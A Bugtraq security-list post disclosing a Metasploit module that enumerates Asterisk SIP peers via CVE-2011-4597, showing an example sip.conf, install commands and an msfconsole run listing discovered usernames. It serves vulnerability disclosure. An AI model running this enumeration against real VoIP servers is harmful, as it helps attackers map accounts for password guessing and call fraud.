Exploit for Asterisk Security Advisory AST-2011-013

From: Ben Williams <ben+bugtraq@wushu.net.nz>
To: Voipsec@voipsa.org,bugtraq@securityfocus.com
Cc:
Subject: Exploit for Asterisk Security Advisory AST-2011-013
Date:

Attachments:
enumerator_asterisk_nat_peers.rb

A Metasploit module is attached that demonstrates how to enumerate
Asterisk sip peers that have a nat setting different to the global sip
nat setting as described in Asterisk Security Advisory AST-2011-013.

The example below finds all peers with nat=yes, but the metasploit module
will also work when global nat=yes and peers have nat=no.

Vulnerability discovered and exploit created by Ben Williams.
References:
   http://downloads.asterisk.org/pub/security/AST-2011-013.html
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4597




Example sip.conf:

[general]
context=default
alwaysauthreject = yes

[1000]
nat=yes
type=peer
secret=12345cdsf0sd9r2e9
callerid=John Doe <1000>
host=dynamic
context=trusted

[1001]
nat=yes
secret=12345
type=peer
host=dynamic

[1002]
secret=12345a
type=peer
host=dynamic



# svn co https://www.metasploit.com/svn/framework3/trunk/
# cp enumerator_asterisk_nat_peers.rb trunk/modules/auxiliary/scanner/sip/
# cd trunk
# msfconsole


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM



         =[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 362 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
         =[ svn r13462 updated 143 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 143 days 
ago.
           We recommend that you update the framework at least every 
other day.
           For information on updating your copy of Metasploit, please see:
               https://community.rapid7.com/docs/DOC-1306


msf > use auxiliary/scanner/sip/enumerator_asterisk_nat_peers
msf  auxiliary(enumerator_asterisk_nat_peers) > info

         Name: SIP Username Enumerator for Asterisk (UDP) Security 
Advisory AST-2011-013, CVE-2011-4597
       Module: auxiliary/scanner/sip/enumerator_asterisk_nat_peers
      Version: 1
      License: Metasploit Framework License (BSD)
         Rank: Normal

Provided by:
    Ben Williams

Basic options:
    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    BATCHSIZE  256              yes       The number of hosts to probe 
in each set
    CHOST                       no        The local client address
    CPORT      5070             no        The local client port
    MAXEXT     9999             yes       Ending extension
    MINEXT     0                yes       Starting extension
    PADLEN     4                yes       Cero padding maximum length
    RHOSTS                      yes       The target address range or 
CIDR identifier
    RPORT      5060             yes       The target port
    THREADS    1                yes       The number of concurrent threads

Description:
    REGISTER scan for numeric peer usernames having a nat setting
    different to global sip nat setting. Works even when
    alwaysauthreject=yes. For this exploit to work, the source port
    cannot be 5060. For more details see Asterisk Project Security
    Advisory - AST-2011-013

msf  auxiliary(enumerator_asterisk_nat_peers) > set RHOSTS 172.16.0.1
RHOSTS => 172.16.0.1
msf  auxiliary(enumerator_asterisk_nat_peers) > set MINEXT 1000
MINEXT => 1000
msf  auxiliary(enumerator_asterisk_nat_peers) > set MAXEXT 2000
MAXEXT => 2000
msf  auxiliary(enumerator_asterisk_nat_peers) > run

[*] Found user: 1000 <sip:1000@172.16.0.1> [Auth]
[*] Found user: 1001 <sip:1001@172.16.0.1> [Auth]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(enumerator_asterisk_nat_peers) >





Copyright © 1995-2021 LinuxRocket.net. All rights reserved.